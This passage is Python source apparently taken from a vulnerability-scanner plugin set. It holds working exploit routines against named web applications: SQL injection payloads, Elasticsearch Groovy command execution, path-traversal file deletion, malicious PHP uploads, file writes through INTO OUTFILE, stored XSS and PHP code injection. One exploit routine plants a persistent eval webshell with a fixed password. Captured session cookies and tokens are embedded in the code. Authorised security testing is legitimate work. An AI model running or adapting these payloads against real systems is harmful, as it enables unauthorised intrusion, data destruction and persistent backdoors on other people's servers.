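def verify(self):
    """Time-based SQL injection check against an ASP.NET login form.

    Posts a harmless login (admin/admin) as a timing baseline, then the same
    form with ``';WAITFOR DELAY '0:0:5'--`` injected into ``txtUserID``, and
    reports when the injected request takes at least ``delay`` seconds longer
    than the baseline.  Only reports; any exception is logged, not raised.

    Fixes over the original: the timing comparison was inverted (it could only
    fire when the *baseline* was the slow request); the bodies were raw strings
    whose base64 ``__VIEWSTATE``/``__EVENTVALIDATION`` values contained
    unencoded ``+`` (a space in form encoding) and stray line-wrap spaces, and
    no Content-Type was sent.  Bodies are now form-encoded by ``requests``.

    NOTE(review): the ViewState/EventValidation blobs were captured from one
    specific instance; a target that validates the ViewState MAC rejects them
    before the query runs, so a clean result is not proof of absence.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target
        delay = 5
        # Must comfortably exceed the injected delay: a ReadTimeout on the slow
        # request would be caught below and the finding silently lost.
        timeout = delay * 4

        def form(viewstate, validation, user):
            # Field order matches the original captured request.
            return {
                '__LASTFOCUS': '',
                '__VIEWSTATE': viewstate,
                '__VIEWSTATEGENERATOR': 'C2EE9ABB',
                '__EVENTTARGET': '',
                '__EVENTARGUMENT': '',
                '__EVENTVALIDATION': validation,
                'txtUserID': user,
                'txtPassword': 'admin',
                'ImageButton1.x': '47',
                'ImageButton1.y': '3',
                'hidFileldBrowserName': 'chrome44.0.2403.157',
                'hidFileldBrowserShell': 'chrome浏览器',
            }

        baseline = form(
            '/wEPDwUJNTU4MTMwNTc4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULY2JJc1JlbWViZXIFDEltYWdlQnV0dG9uMRgx6d11G2zzWntRDJIZph4YGLVfZouvWjmVDOX9030f',
            '/wEdAAdHo7ESDfB43eQm++aON1gP9Tt6KoVd96dN6zOjIKoOlHY2+Mc6SrnAqio3oCKbxYaDr609gOYlKV+bpnR3q6Cx6ZACrx5RZnllKSerU+IuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb/p0Y6tcT3dZFQrnTSmlg62gf3LfDgkRp4YSzbmd+kow=',
            'admin')
        injected = form(
            '/wEPDwUJNTU4MTMwNTc4D2QWAgIDD2QWAgIJDw8WAh4EVGV4dAUb55So5oi35ZCN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFC2NiSXNSZW1lYmVyBQxJbWFnZUJ1dHRvbjGUTVIt9MPbBGiuZg4jaDZnl7GGp6LqcBtLSKtVgDP4lw==',
            '/wEdAAeUy/Z893jBDhlvaCCBA+8t9Tt6KoVd96dN6zOjIKoOlHY2+Mc6SrnAqio3oCKbxYaDr609gOYlKV+bpnR3q6Cx6ZACrx5RZnllKSerU+IuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb10b6bQvRNPx/1qIXDYnt2YfQsDSjm01CMQ7LbBqb8j0=',
            "admin';WAITFOR DELAY '0:0:{}'--".format(delay))

        start = time.time()
        requests.post(url, data=baseline, timeout=timeout)
        mid = time.time()
        requests.post(url, data=injected, timeout=timeout)
        end = time.time()
        # Injected duration minus baseline duration.
        if (end - mid) - (mid - start) > delay:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))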
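def verify(self):
    """Elasticsearch Groovy dynamic-scripting remote code execution check.

    Indexes a throwaway document first so the search has a hit to evaluate
    ``script_fields`` against, then submits a Groovy script field that runs
    ``id`` through ``java.lang.Runtime`` and looks for the uid/gid/groups
    fields of its output in the response.  This executes a (harmless) command
    on the target.  Only reports; exceptions are logged, not raised.

    Fix over the original: every request now carries a timeout so a stalled
    node cannot hang the scan.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        # Seed document: the script runs once per hit, so the index must be non-empty.
        requests.post('{target}/website/blog/'.format(target=self.target),
                      data='''{"name": "csancsan"}''', timeout=timeout)
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Content-Type': 'application/json',
        }
        script = 'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()'
        query = {"size": 1, "script_fields": {"lupin": {"lang": "groovy", "script": script}}}
        resp = requests.post('{target}/_search?pretty'.format(target=self.target),
                             headers=headers, data=json.dumps(query), timeout=timeout)
        # Output of `id` looks like "uid=1000(es) gid=1000(es) groups=...".
        if all(marker in resp.text for marker in ('uid', 'gid', 'groups')):
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))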
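def verify(self):
    """Arbitrary file deletion (picup.php) chained with a login-password log.

    1. ``picup.php?action=del&pic=../data/log/passlog.php`` deletes the
       existing password log (this is DESTRUCTIVE on the target).
    2. A login with ``lonadmin=1`` makes the application write the submitted
       credentials to ``data/log/passlog.php``.
    3. The log is fetched and checked for ``md5("0")``.

    Only reports; exceptions are logged, not raised.

    NOTE(review): the credentials are redacted placeholders (``******``).
    The marker tested for is md5("0"), so whatever the application logs must
    hash to that for the check to ever fire — restore the real values from
    the upstream PoC before relying on this.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target
        timeout = 15
        # Step 1: remove the current password log.
        del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url
        requests.get(del_url, timeout=timeout)
        # Step 2: trigger a logged login attempt.
        login_url = '%s/login.php?action=login&lonadmin=1' % url
        login_data = {
            'loginuser': '******',
            'loginpass': '******',
        }
        requests.post(login_url, data=login_data, timeout=timeout)
        # Step 3: read the regenerated log.
        verify_url = '%s/data/log/passlog.php' % url
        content = requests.get(verify_url, timeout=timeout).text
        if 'cfcd208495d565ef66e7dff9f98764da' in content:  # md5("0")
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))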
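def verify(self):
    """Unrestricted file upload check for maxImageUpload.

    Uploads ``1.php`` (declared as image/jpeg) whose body prints
    ``md5(0x2333333)`` and then deletes itself, fetches it from
    ``/maxImageUpload/original/1.php`` and looks for the hash.  Only reports;
    exceptions are logged, not raised.

    Fix over the original: the marker was tested against the ``Response``
    object instead of ``resp.text``, which can never match.  Requests now
    carry a timeout.

    NOTE(review): ``urljoin`` with an absolute path discards ``base_path``
    from ``self.target``; kept as in the original, confirm it is intended.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        timeout = 15
        probe_url = urllib.parse.urljoin(arg, '/maxImageUpload/original/1.php')
        upload_url = urllib.parse.urljoin(arg, '/maxImageUpload/index.php')
        # The probe removes itself on first execution (unlink(__FILE__)).
        files = {
            'myfile': ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>', 'image/jpeg')
        }
        requests.post(upload_url, files=files, data={'submitBtn': 'Upload'}, timeout=timeout)
        resp = requests.get(probe_url, timeout=timeout)
        if '5a8adb32edd60e0cfb459cfb38093755' in resp.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))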
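def verify(self):
    """eYou ``print_addfeelog.php`` SQL execution check (SELECT ... INTO OUTFILE).

    Sends a base64-encoded ``all_sql`` that writes a PHP file printing
    ``md5("c")`` under the Apache document root, then fetches that file and
    looks for the hash.  This WRITES A FILE on the target that is not cleaned
    up.  Only reports; exceptions are logged, not raised.

    Fixes over the original: the verification URL appended the *filesystem*
    path (``/var/eyou/apache/htdocs/...``) to the site URL — the file lives
    under the document root, so its web path is ``/php/bill/script/index.php``;
    the base64 body was posted as a raw string without a form Content-Type and
    with an unencoded ``+``, it is now sent as a form field; requests have a
    timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        import base64
        timeout = 15
        # Document root and web-relative path of the file the SQL writes.
        docroot = '/var/eyou/apache/htdocs'
        web_path = '/php/bill/script/index.php'
        sql = "select '<?php echo md5(c)?>c' into outfile '{}{}';".format(docroot, web_path)
        url = self.target + '/php/bill/print_addfeelog.php'
        headers = {'Cookie': 'cookie=1;'}
        data = {'all_sql': base64.b64encode(sql.encode()).decode()}
        requests.post(url, headers=headers, data=data, timeout=timeout)
        verify_url = self.target + web_path
        r = requests.get(verify_url, timeout=timeout)
        if '4a8a08f09d37b73795649038408b5f33' in r.text:  # md5("c")
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))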
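def exploit(self):
    """eYou ``print_addfeelog.php`` exploit: plant a PHP webshell via INTO OUTFILE.

    Identical to the verify step except the written file also contains
    ``eval($_POST[c])`` — a persistent backdoor (password ``c``) that the
    report asks the operator to remove.  Only reports; exceptions are logged.

    Fixes over the original: the verification URL appended the *filesystem*
    path to the site URL — the file lives under the document root, so its web
    path is ``/php/bill/script/index.php``; the base64 body is now sent as a
    form field (proper Content-Type, ``+`` encoded); requests have a timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        import base64
        timeout = 15
        docroot = '/var/eyou/apache/htdocs'
        web_path = '/php/bill/script/index.php'
        sql = "select '<?php echo md5(c); eval($_POST[c])?>c' into outfile '{}{}';".format(docroot, web_path)
        url = self.target + '/php/bill/print_addfeelog.php'
        headers = {'Cookie': 'cookie=1;'}
        data = {'all_sql': base64.b64encode(sql.encode()).decode()}
        requests.post(url, headers=headers, data=data, timeout=timeout)
        verify_url = self.target + web_path
        r = requests.get(verify_url, timeout=timeout)
        if '4a8a08f09d37b73795649038408b5f33' in r.text:  # md5("c")
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))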
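def verify(self):
    """Time-based SQL injection check on ``?m=im&a=getDayRecord`` (``user_id``).

    Posts a 40-column UNION baseline, then the same with ``sleep(10)`` in the
    first column, and reports when the sleeping request takes more than 9 s
    longer than the baseline.  Only reports; exceptions are logged.

    Fixes over the original: the raw-string bodies were posted without a
    Content-Type, so PHP would not populate ``$_POST``; requests now carry a
    timeout large enough to survive the injected sleep.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + "/?m=im&a=getDayRecord"
        sleep_seconds = 10
        timeout = sleep_seconds * 4  # must exceed the injected sleep
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        columns = ','.join(str(i) for i in range(1, 41))  # "1,2,...,40"
        data_normal = "user_id=1' and 1=2 UNION SELECT " + columns + "#"
        data_sleep = "user_id=1' and 1=2 UNION SELECT sleep({})".format(sleep_seconds) + columns[1:] + "#"
        t0 = time.time()
        requests.post(url, data=data_normal, headers=headers, timeout=timeout)
        t1 = time.time()
        requests.post(url, data=data_sleep, headers=headers, timeout=timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) > sleep_seconds - 1:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))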
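def verify(self):
    """Time-based SQL injection check for the WordPress Simple Ads Manager plugin.

    Hits ``sam-ajax-admin.php`` with a baseline ``load_posts`` request and then
    with ``SLEEP(5)`` injected into ``cstr``; reports when either request
    returned 200 and the injected one took more than 5 s longer.  Only reports;
    exceptions are logged.

    Fixes over the original: raw-string bodies now carry a form Content-Type
    (PHP ignores the body for ``$_POST`` otherwise) and a timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = '{target}'.format(target=self.target) + 'wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'
        delay = 5
        timeout = delay * 4
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        baseline = 'action=load_posts&cstr==1&sp=Post&spg=Page'
        injected = 'action=load_posts&cstr==1%27)%20AND%20SLEEP(5)%20AND%20(%27WhYm%27=%27WhYm&sp=Post&spg=Page'
        t0 = time.time()
        r_base = requests.post(url, data=baseline, headers=headers, timeout=timeout)
        t1 = time.time()
        r_inj = requests.post(url, data=injected, headers=headers, timeout=timeout)
        t2 = time.time()
        reachable = r_base.status_code == 200 or r_inj.status_code == 200
        if reachable and (t2 - t1) - (t1 - t0) > delay:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))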
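def verify(self):
    """Stored XSS check for FrogCMS page editing (``admin/?/page/edit/3``).

    Saves page 3 with ``"/><script>confirm(1234)</script>`` in the keywords
    field, then fetches ``?about_us`` and looks for the unescaped script tag.
    This PERSISTS the payload on the target.  Only reports; exceptions are
    logged, not raised.

    Fixes over the original: cookie names kept a leading space after the
    ``;`` split; the raw-string body was posted without a form Content-Type;
    requests had no timeout.

    NOTE(review): the cookie string (PHPSESSID, csrf_token, frog_auth_user)
    is a captured session from the author's test instance and the path is
    hard-coded to ``/FrogCMS-master``; both must be replaced per target, e.g.
    from the ``cookies`` option other checks in this file use.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
        cookies = {}
        for item in raw_cookies.split(';'):
            name, value = item.split('=', 1)  # split once: values may contain '='
            cookies[name.strip()] = value.strip()
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        edit_url = self.target + '/FrogCMS-master/admin/?/page/edit/3'
        data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
        requests.post(edit_url, cookies=cookies, headers=headers, data=data, timeout=timeout)
        verify_url = self.target + '/FrogCMS-master/?about_us'
        r = requests.get(verify_url, timeout=timeout)
        if "<script>confirm(1234)</script>" in r.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))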
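def verify(self):
    """PHP code injection via controller creation (``admin.php?c=syscontroller&m=add``).

    Creates a controller whose name closes a comment and injects
    ``phpinfo();``, then requests ``index.php?c=myndtt&m=index`` and looks
    for phpinfo output.  This PERSISTS a controller on the target.  Only
    reports; exceptions are logged, not raised.

    Fixes over the original: the raw-string body now carries a form
    Content-Type (PHP does not populate ``$_POST`` without it) and requests
    have a timeout.

    NOTE(review): ``cookies`` is empty — the admin endpoint presumably needs
    an authenticated session (the commented-out parser hints at that), so
    this check is unlikely to fire without one; confirm against the target.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        cookies = {}  # supply an authenticated session here if the target requires one
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        add_url = self.target + "/admin.php?c=syscontroller&m=add&post=1"
        data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
        requests.post(add_url, cookies=cookies, headers=headers, data=data, timeout=timeout)
        verify_url = self.target + '/index.php?c=myndtt&m=index'
        r = requests.get(verify_url, timeout=timeout)
        if 'PHP Version' in r.text and 'System' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))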
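def verify(self):
    """Time-based SQL injection check for HDWiki image search (``searchtext``).

    Posts a UNION baseline that evaluates ``md5(c)`` and then one that
    evaluates ``sleep(10)``; reports when the sleeping request takes more than
    9 s longer.  Only reports; exceptions are logged.

    Fixes over the original: the path started with a space
    (``' /hdwiki/...'``) so the built URL was invalid; the ``headers`` dict
    was built but never sent; the raw-string body had no form Content-Type;
    requests had no timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + '/hdwiki/index.php?pic-search'
        sleep_seconds = 10
        timeout = sleep_seconds * 4
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        # 'searchfull' is the GBK-encoded submit button label of the original form.
        data_sleep = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),sleep(10),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
        data_normal = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),md5(c),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
        t0 = time.time()
        requests.post(url, data=data_normal, headers=headers, timeout=timeout)
        t1 = time.time()
        requests.post(url, data=data_sleep, headers=headers, timeout=timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) > sleep_seconds - 1:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))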
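def verify(self):
    """Boolean-based SQL injection check for ``memberSurveyAction!answerQuestion.do``.

    Submits the survey with ``' AND 'Pesh'='Pesh`` (true) and
    ``' AND 'Pesh'='hyhmnn`` (false) in ``answerList[3].optionValue`` and
    reports when the two responses differ.  Only reports; exceptions are
    logged, not raised.

    Fixes over the original: a hard-coded ``Content-Length: 2916`` header
    that did not match the body (``requests`` computes the real one) and a
    fixed ``Connection`` header were dropped; the true condition is sent twice
    and must reproduce itself before a true/false difference is trusted,
    which filters out pages that simply differ on every request; the two
    bodies are built from one template instead of being duplicated; requests
    have a timeout.

    NOTE(review): ``JSESSIONID`` and the Struts ``token`` are captured values
    that a real target will not accept; and ``&[email protected]`` is a
    scraping artifact — the original parameter name and address were lost and
    must be restored from the upstream PoC.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + "/web/member/memberSurveyAction!answerQuestion.do"
        timeout = 15
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": "JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1",
            "Accept-Encoding": "gzip,deflate",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36",
            "Accept": "*/*",
        }
        template = (
            "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105"
            "&answerList[0].questionId=13&answerList[0].surveyId=2"
            "&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128"
            "&answerList[1].questionId=14&answerList[1].surveyId=2"
            "&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2"
            "&answerList[3].optionId=129&answerList[3].optionValue={cond}&answerList[3].otherOptionId=134"
            "&answerList[3].questionId=16&answerList[3].surveyId=2"
            "&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150"
            "&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143"
            "&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145"
            "&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149"
            "&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154"
            "&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152"
            "&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147"
            "&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140"
            "&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1"
            "&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2"
            "&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2"
            "&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164"
            "&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171"
            "&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173"
            "&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167"
            "&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169"
            "&answerList[6].optionValue=1&answerList[6].otherOptionId=173"
            "&answerList[6].questionId=19&answerList[6].surveyId=2"
            "&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2"
            "&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179"
            "&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177"
            "&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180"
            "&answerList[8].optionValue=1&answerList[8].otherOptionId=181"
            "&answerList[8].questionId=21&answerList[8].surveyId=2"
            "&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2"
            "&siteId=5&struts.token.name=token&surveyMember.company=Baidua"
            "&surveyMember.country=AFG&surveyMember.genderCode=female"
            "&[email protected]"
            "&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx"
            "&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F"
        )
        body_true = template.format(cond="' AND 'Pesh'='Pesh")
        body_false = template.format(cond="' AND 'Pesh'='hyhmnn")
        true_1 = requests.post(url, data=body_true, headers=headers, timeout=timeout).text
        false_1 = requests.post(url, data=body_false, headers=headers, timeout=timeout).text
        true_2 = requests.post(url, data=body_true, headers=headers, timeout=timeout).text
        # Stable true response that differs from the false one.
        if true_1 == true_2 and true_1 != false_1:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))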
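def verify(self):
    """Time-based SQL injection check for ``/cpapi/qxtapi.php`` (XML ``RecvTime``).

    Posts an XML message whose ``RecvTime`` ends the string and appends
    ``|sleep(0)`` (baseline) or ``|sleep(5)``; reports when the sleeping
    request takes more than 4 s longer.  Only reports; exceptions are logged.

    Fix over the original: both requests used ``timeout=3`` while the
    injection sleeps for 5 s, so the vulnerable case always raised
    ``ReadTimeout`` and was logged as an error instead of reported.  The
    unused ``payloads`` charset list was dropped.

    NOTE(review): the ``X-FORWARDED-FOR`` header is kept from the original
    PoC (the endpoint may be source-IP restricted); confirm if it matters.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        delay = 5
        timeout = delay * 4  # must exceed the injected sleep
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',
            'X-FORWARDED-FOR': '221.179.180.156',
        }
        url = self.target + '/cpapi/qxtapi.php'
        xml = ("<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content>"
               "<RecvTime>0'|sleep({})#</RecvTime></Message></Body></aaaa>")
        data_normal = xml.format(0)
        data_sleep = xml.format(delay)
        t0 = time.time()
        requests.post(url, data=data_normal, headers=headers, timeout=timeout)
        t1 = time.time()
        requests.post(url, data=data_sleep, headers=headers, timeout=timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) > delay - 1:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))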
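def verify(self):
    """Time-based SQL injection check for Cacti ``graphs_new.php`` (``cg_g``).

    Posts a baseline with ``md5(c)`` and then ``sleep(5)`` in an XOR
    subquery; reports when the sleeping request takes more than 4 s longer.
    Only reports; exceptions are logged.

    Fixes over the original: raw-string bodies now carry a form Content-Type
    (PHP does not populate ``$_POST`` without it) and a timeout; ``data`` is
    passed by keyword.

    NOTE(review): ``__csrf_magic`` is a captured token — a target that checks
    it will reject the request before the query runs.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + '/cacti/graphs_new.php'
        delay = 5
        timeout = delay * 4
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        body = ("__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184"
                "&cg_g=033926697+xor+(select(0)from(select {})v)"
                "&save_component_graph=1&host_id=2&host_template_id=0&action=save")
        data_normal = body.format('md5(c)')
        data_sleep = body.format('sleep(5)')
        t0 = time.time()
        requests.post(url, data=data_normal, headers=headers, timeout=timeout)
        t1 = time.time()
        requests.post(url, data=data_sleep, headers=headers, timeout=timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) > delay - 1:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞;\n漏洞地址为{url};具体请查看漏洞详情'.format(
                    target=self.target, name=self.vuln.name, url=url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))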
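def verify(self):
    """Time-based SQL injection check for webmail ``contact-del`` (``contact_ids``).

    Injects into what is a DELETE operation.  The baseline now uses
    ``-1) or sleep(0)#`` instead of the original ``-1) or 1#``: an always-true
    predicate in a delete statement can wipe every contact of the session,
    while ``sleep()`` evaluates to 0 (false) and keeps the statement a no-op.
    Reports when the ``sleep(5)`` request takes more than 4 s longer than the
    baseline.  Only reports; exceptions are logged.

    Also fixed: raw-string bodies carry a form Content-Type and a timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + '/webmail/client/pab/index.php?module=operate&action=contact-del'
        delay = 5
        timeout = delay * 4
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        data_sleep = "contact_ids=-1) or sleep({})%23".format(delay)
        data_normal = "contact_ids=-1) or sleep(0)%23"
        t0 = time.time()
        requests.post(url, data=data_normal, headers=headers, timeout=timeout)
        t1 = time.time()
        requests.post(url, data=data_sleep, headers=headers, timeout=timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) > delay - 1:
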